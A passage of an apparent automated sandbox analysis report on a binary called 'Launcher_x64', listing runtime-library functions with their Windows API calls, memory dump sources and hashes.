                                                                                                                                                                                                                                                                                        • Opcode ID: f9f13d976561d17bf7d42ba22ad2bf1ad6dc44512de61e26377f7d0e21219566
                                                                                                                                                                                                                                                                                        • Instruction ID: 7b6a2db611e65d82526a96c6f3fd5f12d89defa53f90b0387e07c3a5a4a79228
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9f13d976561d17bf7d42ba22ad2bf1ad6dc44512de61e26377f7d0e21219566
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4F01C3A400215BBCF222F91EC09AAA7F26FB093A1F054110FA18C5220C7728920EFB8
                                                                                                                                                                                                                                                                                        Function 00D27AE3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00D1D04D,?,?,?,00000055,?,-00000050,?,?,?), ref: 00D27BA2
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00D1D04D,?,?,?,00000055,?,-00000050,?,?), ref: 00D27BD9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                                                        • String ID: utf8
                                                                                                                                                                                                                                                                                        • API String ID: 943130320-905460609
                                                                                                                                                                                                                                                                                        • Opcode ID: 815f3c6d89176750f160a63a57c2a0c7ee81b9d5eac64e1de8f3afb5bdced2f8
                                                                                                                                                                                                                                                                                        • Instruction ID: a684d1ddf9c2066c4642cdb529d538a93ebfd6ec67fe451723e648d8d367294d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 815f3c6d89176750f160a63a57c2a0c7ee81b9d5eac64e1de8f3afb5bdced2f8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09511671A08321AADB35AB71EC42FBA73A8EF64708F180469FA45DB181FB70D940D775
                                                                                                                                                                                                                                                                                        Function 00D22C4A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D22B4B,?,?,00000000,00000000,00000000,?), ref: 00D22C6F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: EncodePointer
                                                                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                        • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                                                        • Opcode ID: 085dbb4d49eb33809942be9a2e986f87e671d758556dd38fb71b11218ebb0e18
                                                                                                                                                                                                                                                                                        • Instruction ID: 59674225448f26e6fe65cc4255fb2b84408fd8e463ce21aa2f9a658876acec4d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 085dbb4d49eb33809942be9a2e986f87e671d758556dd38fb71b11218ebb0e18
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE415B72900219BFCF15DF98ED81AEE7BB5FF68308F188099F90467221D3359961DBA1
                                                                                                                                                                                                                                                                                        Function 00D224B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00D2272D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                                                                        • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                                                        • Opcode ID: ab442a48b86844931e46a82c5d08626745082cb09e4190d0b5adf3c61f8e3191
                                                                                                                                                                                                                                                                                        • Instruction ID: 10cdc765b1db3b60bacc4045ddbd814b565e1eb8eeaab7d1dd4c98041baf4467
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab442a48b86844931e46a82c5d08626745082cb09e4190d0b5adf3c61f8e3191
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5031A136400229BBCF264F54E84187ABB66FF6871DB1C8559FC544A121C3B2DD61DBB2
                                                                                                                                                                                                                                                                                        Function 00D1308C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D13114
                                                                                                                                                                                                                                                                                        • RaiseException.KERNEL32(?,?,?,?), ref: 00D13139
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D17223: RaiseException.KERNEL32(E06D7363,00000001,00000003,00D15F93,?,?,?,?,00D15F93,00001000,00D3E1AC,00001000), ref: 00D17284
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D1F7B9: IsProcessorFeaturePresent.KERNEL32(00000017,00D1A37B,?,?,?,?,00000000), ref: 00D1F7D5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                        • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                                                        • Opcode ID: 432f64a3b700b3dd4e3842db495c8ff75ac6d962bfe820aa276ab8455ebad763
                                                                                                                                                                                                                                                                                        • Instruction ID: 4927b0276cdcd7d6933414976c06b86d90ca4274e2d159efdb06552996297a3a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 432f64a3b700b3dd4e3842db495c8ff75ac6d962bfe820aa276ab8455ebad763
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA213A32D00318BBCF24DF95E9459EEB7B9EF08710F580419E519AB650DA30AEC5CBB1

                                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                                        Function 00D28B44 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00D28515,00000002,00000000,?,?,?,00D28515,?,00000000), ref: 00D28BDD
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00D28515,00000002,00000000,?,?,?,00D28515,?,00000000), ref: 00D28C06
                                                                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,?,00D28515,?,00000000), ref: 00D28C1B
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                        • Opcode ID: e57decdd37a52e6218d956aa21e20c76ba66e0e136436aeee860d309e6587f8a
                                                                                                                                                                                                                                                                                        • Instruction ID: 16eda18aced5fe7286a0310bb74890f4cfac05d7844bb2afde14c5d01666f21f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e57decdd37a52e6218d956aa21e20c76ba66e0e136436aeee860d309e6587f8a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6421CD62702120AADB348F54F941A97B3A7EF74B68B5E8429E549D7200EF31DD40F770
                                                                                                                                                                                                                                                                                        Function 00D283DF Relevance: 7.7, APIs: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00D284E7
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00D28525
                                                                                                                                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00D28538
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00D28580
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00D2859B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 415426439-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d85e14ccc02a1d04b3671f13216dcf2599b42aeb8d0d96dfc3b3ef886d002ae0
                                                                                                                                                                                                                                                                                        • Instruction ID: b73c5bf5b4ac5ed6c15cc3fada67feb6a38e569b31b43dc761ded1df80da9332
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d85e14ccc02a1d04b3671f13216dcf2599b42aeb8d0d96dfc3b3ef886d002ae0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70518371901226AFDB20EFA4EC41ABE77B9FF64708F084469E910E7150DB74DA41DB71
                                                                                                                                                                                                                                                                                        Function 00D21250 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: e210328f8d4f359fac80214519e11883391db29b0651a67b32ed7d6b3dc8e133
                                                                                                                                                                                                                                                                                        • Instruction ID: 93956f05759d0228050c6224d6f0c7fefcf0d186ad30724eb730d88210f7296c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e210328f8d4f359fac80214519e11883391db29b0651a67b32ed7d6b3dc8e133
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75022E75E012299FDF14CFA9D8806ADBBF1FF68318F288269D515E7341D731A941CBA0
                                                                                                                                                                                                                                                                                        Function 00D29126 Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D29216
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6321883f8ca6365d62f3f81bb7a087317c05e5b91a8cd923acc66427573220da
                                                                                                                                                                                                                                                                                        • Instruction ID: aea15b9ec05a7b294cce697f436078a6410a41b13d02d052810a386d72cbe51e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6321883f8ca6365d62f3f81bb7a087317c05e5b91a8cd923acc66427573220da
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D71E671804279AFDF21EF24AC99AEAF7B9EF15308F1841D9E04D93251DA304E858F34
                                                                                                                                                                                                                                                                                        Function 00D16528 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D16534
                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00D16600
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D16619
                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00D16623
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 254469556-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6d004db1e1d530777ec3803eb55d07cc919aa30f5de151e9104138384e85f543
                                                                                                                                                                                                                                                                                        • Instruction ID: 76953300afc11c3ee55e77bd50c8f9b1db3081ab984a1f2dfd0fa11dce8a27b9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d004db1e1d530777ec3803eb55d07cc919aa30f5de151e9104138384e85f543
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC31F675D05318ABDB20DFA4E9497CDBBB8BF08304F1041EAE40CAB250EB709A85CF65
                                                                                                                                                                                                                                                                                        Function 00D31F22 Relevance: 12.2, APIs: 8, Instructions: 248COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,00D31F0D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 00D31FC8
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D32083
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D32112
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D3215D
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D32163
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D32199
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D3219F
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D321AF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 127012223-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 240c4e85371a9d665bf72230af401ccc9cb89dd968403ce96ef8b1977119fb30
                                                                                                                                                                                                                                                                                        • Instruction ID: c0d97c1af6f38bf4fe7d2ef02e22764569d7bbfc72b08921a31e10bcbbacc75b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 240c4e85371a9d665bf72230af401ccc9cb89dd968403ce96ef8b1977119fb30
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C771D072E00309ABDF259A948D42BBF7BBAEF55310F2C4019EA44A7281DB75DC44C7B0
                                                                                                                                                                                                                                                                                        Function 00D16A69 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00D16AB0
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D16ADC
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00D16B1B
                                                                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D16B38
                                                                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D16B77
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D16B94
                                                                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00D16BD6
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00D16BF9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
